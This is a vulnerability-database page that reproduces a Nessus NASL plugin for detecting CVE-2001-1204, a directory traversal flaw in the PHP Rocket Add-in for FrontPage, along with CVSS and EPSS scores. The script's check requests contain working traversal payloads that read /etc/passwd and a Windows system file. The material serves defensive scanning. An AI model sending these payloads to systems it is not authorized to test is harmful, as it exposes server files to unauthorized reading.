Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2002-2022 H D Moore & Drew Hintz ( http://guh.nu )PHPROCKETADDIN_TRAVERSAL.NASL
HistoryJan 17, 2002 - 12:00 a.m.

PHP Rocket for FrontPage phprocketaddin page Parameter Traversal Arbitrary File Access

2002-01-1700:00:00
This script is Copyright (C) 2002-2022 H D Moore & Drew Hintz ( http://guh.nu )
www.tenable.com
66

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.006 Low

EPSS

Percentile

78.5%

JSON

There is a vulnerability in the PHP Rocket Add-in for FrontPage that allows a remote attacker to view the contents of any arbitrary file to which the web user has access. This vulnerability exists because the PHP Rocket Add-in does not filter out …/ and is, therefore, susceptible to this directory traversal attack.

#%NASL_MIN_LEVEL 70300
#
# This script was written by Drew Hintz ( http://guh.nu ) and Valeska Pederson
#
# It is based on scripts written by Renaud Deraison and  HD Moore
#
# See the Nessus Scripts License for details
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(10831);
  script_version("1.31");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2001-1204");
  script_bugtraq_id(3751);

  script_name(english:"PHP Rocket for FrontPage phprocketaddin page Parameter Traversal Arbitrary File Access");

  script_set_attribute(attribute:"synopsis", value:
"Arbitrary files may be read on the remote server.");
  script_set_attribute(attribute:"description", value:
"There is a vulnerability in the PHP Rocket Add-in for FrontPage that
allows a remote attacker to view the contents of any arbitrary file
to which the web user has access.  This vulnerability exists because the
PHP Rocket Add-in does not filter out ../ and is, therefore, susceptible
to this directory traversal attack.");
  script_set_attribute(attribute:"solution", value:
"None");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2001/12/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2002/01/17");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:total_pc_solutions:php_rocket_add-in");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2002-2022 H D Moore & Drew Hintz ( http://guh.nu )");

  script_dependencies("find_service1.nasl", "http_version.nasl");
  script_require_keys("www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("http_func.inc");
include("global_settings.inc");

port = get_http_port(default:80, embedded:TRUE);

if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);
if (get_kb_item("Services/www/"+port+"/embedded" ) ) exit(0);



#check for vulnerable version running on *nix

function check(req)
{
 local_var pat, r, soc;

 soc = http_open_socket(port);
 if(soc)
 {
 req = http_get(item:req, port:port);
 send(socket:soc, data:req);
 r = http_recv(socket:soc);

 http_close_socket(soc);
 pat = "root:"; #string returned by webserver if it's vulnerable
 if(pat >< r) {
   if(egrep(pattern:".*root:.*:0:[01]:.*", string:r)) {
	   	security_warning(port:port);
		exit(0);
   } #end final if pattern match
  } #ends outer if pattern match
 } #ends outer if(soc)
 return(0);
} #ends function

url = string("/phprocketaddin/?page=../../../../../../../../../../../../../../../etc/passwd");
if(check(req:url))exit(0);

url = string("/index.php?page=../../../../../../../../../../../../../../../etc/passwd");
if(check(req:url))exit(0);


#check for vulnerable version running on Windows


function checkwin(req)
{
 local_var pat, r, soc;

 soc = http_open_socket(port);
 if(soc)
 {
 req = http_get(item:req, port:port);
 send(socket:soc, data:req);
 r = http_recv(socket:soc);

 http_close_socket(soc);
 pat = "IP Configuration"; #string returned by webserver if it's vulnerable

 if(pat >< r) {
   	security_warning(port:port);
	return(1);
 	}
 }
 return(0);
}

url = string("/phprocketaddin/?page=../../../../../../../../../../../../../../../WINNT/system32/ipconfig.exe");
if(checkwin(req:url))exit(0);

url = string("/index.php?page=../../../../../../../../../../../../../../../../../WINNT/system32/ipconfig.exe");
if(checkwin(req:url))exit(0);
VendorProductVersionCPE
total_pc_solutionsphp_rocket_add-incpe:/a:total_pc_solutions:php_rocket_add-in

Related

cvelist 1
openvas 1
nvd 1
cve 1
cvelist
cvelist
CVE-2001-1204
2002-03-15 05:00:00
openvas
openvas
Total PC Solutions PHP Rocket Add-in for FrontPage File Traversal Vulnerability
2005-11-03 00:00:00
nvd
nvd
CVE-2001-1204
2001-12-28 05:00:00
cve
cve
CVE-2001-1204
2002-03-15 05:00:00

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.006 Low

EPSS

Percentile

78.5%

JSON
Related for PHPROCKETADDIN_TRAVERSAL.NASL
cvelist1openvas1nvd1cve1